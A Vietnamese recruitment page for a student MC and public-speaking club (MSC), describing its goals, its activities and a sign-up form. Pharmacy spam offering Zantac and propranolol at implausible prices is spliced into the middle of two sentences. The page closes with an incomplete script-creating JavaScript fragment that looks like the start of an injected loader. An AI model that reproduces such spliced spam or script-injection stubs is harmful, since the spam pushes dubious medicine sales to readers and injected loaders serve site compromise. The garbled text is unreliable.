Lost your password?

Tạo ra sân khấu cho chính mình? tại sao không? CLB MSC là nơi bạn chinh phục sân khấu thể hiện bản lĩnh thông qua các vai trò phóng viên đường phố, biên tập viên, MC, diễn giả…

Bạn trẻ?

Bạn tự tin?

Bạn muốn thể hiện tài năng?

Bạn muốn được giao lưu với những MC, diễn giả có nhiều kinh nghiệm?

Và đặc biệt, Bạn muốn TỎA SÁNG?

Hãy đến với chúng tôi và hiện thực hóa ước mơ của bạn đi nào!!!

 

CÂU LẠC BỘ MC & SPEAKER

(Master of Ceremonies & Speaker Club)

MSC là nơi ươm mầm những tài năng tương lai – những MC và diễn giả chuyên nghiệp.

Chúng tôi tạo ra môi trường để bạn có thể tiếp cận, làm quen với môn nghệ thuật “nói” chuyên nghiệp. Đến với câu lạc bộ, các bạn không You can buy your Zantac only for $0.23 right now! Take advantage of this premium offer! chỉ có cơ hội được thể hiện kiến thức, khả năng và sở thích của mình mà còn có thể học hỏi kinh nghiệm qua những ý kiến nhận xét từ chính khán giả, những MC hay diễn giả có nhiều kinh nghiệm.

MỤC TIÊU HOẠT ĐỘNG

MSC hoạt động nhằm mục đích kết nối toàn bộ những người trẻ nhiệt huyết với mục tiêu vững vàng kỹ năng, giàu vốn sống và thành thạo tiếng Anh, sống khát vọng và nỗ lực

Chúng tôi kết nối các bạn sinh viên thông qua các hoạt Do you want to save on your propranolol purchase and get a quality medicine? Buy it at our store for 0.38 USD and save big! động ngoại khóa bổ ích và hấp dẫn, tạo lập cho các bạn một môi trường sôi nổi, thân thiện để các bạn tự tin thể hiện bản thân, khai phá tài năng tiềm ẩn trong mỗi con người.

Chúng tôi tạo cơ hội cho bạn phát triển toàn bộ các kĩ năng để trở thành một MC hay diễn giả chuyên nghiệp (kĩ năng thuyết trình, kĩ năng làm việc nhóm, kĩ năng phát thanh bản tin, kỹ năng sân khấu…), từ đó giúp đỡ định hướng con đường phát triển nghề nghiệp tương lai dành cho bạn.

NỘI DUNG HOẠT ĐỘNG

Bạn sẽ được thử sức trong vai trò là một biên tập viên truyền hình, một phóng viên đường phố hay một MC, một diễn giả cực kì thu hút trên sân khấu…

Bạn sẽ được hướng dẫn thiết kế kịch bản và dẫn chương trình cho các buổi sinh hoạt thường xuyên của CLB cũng như các event bên trong và bên ngoài S-com.

Ngoài ra bạn sẽ có cơ hội giao lưu với các diễn giả và MC nhiều kinh nghiệm để được chia sẻ và hướng dẫn những kĩ năng khiến bạn cực kỳ ấn tượng trên sân khấu hay đơn giản chỉ là làm bạn cảm thấy tự tin hơn khi đứng thuyết trình trước đám đông.

 

Nơi quy tụ tất cả những bạn trẻ tài năng và đam mê nghệ thuật “nói chuyên nghiệp”

Bạn đã sẵn sàng để TỎA SÁNG chưa nào???

 

COME WITH US AND CHASE YOUR DREAM!!!

Đăng ký thành viên MSC tại:

https://docs.google.com/a/smartcom.vn/forms/d/1P9D2AVd9DqTeWGQQkK0GEH8j6z-f3p4Yow6BO2zQfLY/viewform

var d=document;var s=d.createElement(‘script’);